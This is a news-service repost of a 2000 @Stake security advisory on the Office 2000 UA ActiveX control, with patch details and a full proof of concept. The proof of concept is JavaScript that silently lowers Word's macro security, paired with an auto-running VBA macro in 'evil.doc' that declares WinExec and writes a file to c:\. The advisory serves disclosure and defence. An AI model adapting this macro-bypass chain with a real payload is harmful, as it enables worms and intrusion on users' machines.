| Telecom and Logistics Associates |
Security NEWs Service: TLAnews |
| publication: Christian ALT | 
TLAalert
Security Service |
| Telecom and Logistics Associates |
Security NEWs Service: TLAnews |
| publication: Christian ALT |
TLAalert
Security Service |
|
En
français: MS à nouveau critiqué
sur la sécurité |
|
|
|
"Because its abilities are marked 'safe for scripting,' anything is possible," said the security researcher that found the hole, a hacker known as "Dildog" who works for the security firm @Stake Inc.
When it debuted, the Office Assistant was dismissed by critics as the equivalent of training wheels for computer newbies. Yet the friendliness of the Office Assistant hides a great deal of power. In fact, it's essentially a back door for Microsoft to allow macros that can take control of a PC and help out users.
That control, however, can be manipulated to hurt users as well. A test program created by @Stake can set the system security to "low" and copy a text document to the hard drive.
|
@Stake Inc.
L0pht Research Labs
www.atstake.com www.L0pht.com
Security Advisory
Advisory Name: Microsoft Office 2000 UA Control Scripting
Release Date: 5-12-2000
Application: Microsoft Office 2000
Platform: Windows 95/98, NT 4.0 and 2000
Severity: Malicious active content can execute regardless of
macro virus protection settings.
Author: DilDog [dildog@atstake.com]
Vendor Status: Vendor contacted, official patch available
Web: http://www.L0pht.com/advisories.html
Overview:
Microsoft Office 2000 ships with an ActiveX control named "Microsoft Office
UA Control". It is installed by default and is categorized as being "safe for scripting".
The control is undocumented, and its interfaces are presumably used to script "Show Me"
demonstrations for Office 2000 help and 'office assistant' functionality. Analysis of the
control's interface reveals functionality to script almost any action in Office 2000
that the user could perform from the keyboard, including, but not limited to, lowering
the macro security settings to low. This action can be scripted from any HTML page viewed
with active scripting enabled, including both Internet Explorer and Outlook e-mail in
their default configurations.
Detailed Description:
The Microsoft Office UA control exports a powerful interface for automating
commands withing the Office 2000 environment. The problem lies in the fact that the
control should -not- be marked safe for scripting. The capabilities of this control
are such that scripting it via remote HTML and email sources makes it extremely dangerous.
A demonstration of the vulnerabilites associated with this control is provided below.
The vulnerability demonstration performs the following actions:
1. Start instance of Microsoft Word by pointing a table frame to a
word document URL with no macros or active content.
2. Programatically create UA control
3. Attach UA control to first instance of Microsoft Word
4. Make Word the active application
5. Show the Tools/Macro/Security dialog
6. Click on the 'LOW' security radio button
7. Click on the 'OK' button to confirm the change
8. Proceed to re-point a table frame to a word document URL with a macro, which
runs without prompting.
The fact that this control exists and is installed in this particular fashion would
permit the construction of a worm of unparalleled devastation, as it would be able to
turn off macro virus protection and 'script' it's way to all of the people in your
address book.
Temporary Solution:
Disable Active Scripting in all Office 2000 applications, and in Internet Explorer.
It is no longer sufficient to turn on macro virus protection, as this vulnerability
allow those settings to be circumvented.
Vendor Response And Official Patch:
From secure@microsoft.com
"Wanted to let you know that the patch is now live at
http://officeupdate.microsoft.com/info/ocx.htm, and the security bulletin is live at
http://www.microsoft.com/technet/security/bulletin/ms00-034.asp."
Proof-of-Concept Code:
A demonstration of this vulnerability is available at:
http://www3.l0pht.com/~dildog/ouahack/index.html
This demonstration will set your Word 2000 macro security settings to 'LOW'. An
option will be presented to set it back to 'HIGH' or 'MEDIUM'.
The demonstration code is intentionally written to be harmless, but a worst case
scenario could easily involve more malicious code to perform such actions as file
modification, propagating worms and virii, or providing external access to internal
network resources.
dildog@atstake.com
[ For more advisories check out http://www.l0pht.com/advisories.html ]
L-ZERO-P-H-T
|
OUA Vulnerability Proof of ConceptThis demonstration will modify the security settings of your Microsoft Word 2000 software, and prompt you if you want to return them back to their original settings. It will also place a small file in "c:\".This demonstration requires that Office 2000 is installed, and that you are running Internet Explorer 4.0 or higher. It also requires that you have Active
Scripting enabled.
|
Unknowingly you received a word Office 2000 file called evil.doc, and a second called blank.doc . This files are not viewed, but word will shortly start.
evil.doc
Option Explicit
Public Sub Document_Open()
demonstration
End Sub
Option Explicit
Public Declare Function WinExec Lib "kernel32.dll" (ByRef lpFileName As Any, ByVal nCmdRef As Integer) As Integer
Sub demonstration()
Open "c:\DILDOG_WAS_HERE.TXT" For Output As #1
Print #1, "Your copy of Office 2000 is vulnerable to the"
Print #1, "Office 2000 UA control remote scripting vulnerability."
Print #1, "See http://www.l0pht.com for more information."
Close #1
End Sub
|
Microsoft Office 2000
A file is named "c:\dildog_was_here.txt"
should be created.
|
on c:\ you find the file dildog_was_here.txt
|
Your copy of Office 2000 is vulnerable to the
|
The code
|
oua.html
/* Office UA Control Example Known ShowDialog TCIDs for POWERPOINT (some are global to other office apps): 0: New Slide 2: Check spelling 3: Save As 4: Print 8: Insert Table 17: Insert Chart 18: New Presentation 22: Paste 23: Open 26: Unknown. Makes hard drive whirr a lot. Sounds like a search operation. 141: Find 169: Show rulers 184: Record macro 186: Play macro 298: Restore MDI Child 313: Split MDI Child 409: Draw with pen 411: Draw with line 522: Options dialog 546: Insert Object 548: View Controls Toolbar 680: New Slide 681: Insert Table 682: Insert Clipart 684: Write-Up 689: View autoshapes toolbar 700: Something I forgot 701: Assign Design Template 702: Whirr a lot 703: Insert Powerpoint Object? 704: Insert Powerpoint Object? 731: Slide Transition 733: Autocontent Wizard 734: Full Slide Show 735: Funky Grid Thing 736: Maximize Workspace 737: Maximize TOC 738: Maximize Thumbnails 739: Maximize Page view 740: Full screen show 741: show master text styles 748: Save As 750: Properties 755: Paste Special 762: Header/Footer 768: Add Date/Time 769: Add Page Number 790: Choose Language 793: Autocorrect 797: Customize 831: Open recent document 837: LAUNCH OUTLOOK 838: Launch outlook in a different way 841: Move cursor? 842: Move cursor? 843: Maximize MDI Client 916: Show table/border toolbar 925: Zoom 927: About 938: Mail document? 943: Add-Ins 959: Activate 983: Help 1004: Activate Retarded Paperclip (tm) 1015: Open Location 1016: Launch Internet Explorer?! 1021: Browse Favorites 1023: Hide Toolbars? 1031: WordArt 1056: Shadow Settings 1057: 3D Settings 1110: Insert Autoshape? 1111: Insert rectangle 1112: Insert Parallelogram 1113: Insert Rhombus 1114: Insert Diamond ... 1119: Insert Circle ... 1144: Insert Up Arrow 1145: Insert Down Arrow ... 1561: LAUNCH VISUAL BASIC For word, 1695 is launch visual basic * Hrm. That's enough of that.... * */ var ua; function setup() {
// Create UA control
ua = new ActiveXObject("OUACtrl.OUACtrl.1");
// Attach ua object to ppt object
ua.WndClass="OpusApp";
ua.OfficeApp=0;
// Verify UA objects sees Office application
return ua.IsAppRunning(); }
function disablemacroprotection() { var ret;
// Activate application
ua.AppActivate();
// Display macro security dialog
ua.ShowDialog(0x0E2B);
// Click the 'low' button
ua.SelectTabSDM(0x13);
// Click the 'ok' button
ua.SelectTabSDM(1);
}
function enablemacroprotection() {
// Activate application
ua.AppActivate();
// Display macro security dialog
ua.ShowDialog(0x0E2B);
// Click the 'medium' button
ua.SelectTabSDM(0x12);
// Click the 'ok' button
ua.SelectTabSDM(1);
} // Beginning of script execution
if(setup())
{
disablemacroprotection();
parent.frames["blank"].location="evil.doc"; } |
Author information.
|
All information provided is of a general nature and is not
intended to address the circumstances of any particular individual or entity.
Although we endeavor to provide accurate and timely information, there can be no
guarantee that such information is accurate as of the date it is received or
that it will continue to be accurate in the future. No one should act upon such
information without appropriate professional advice after a thorough examination
of the facts of the particular situation.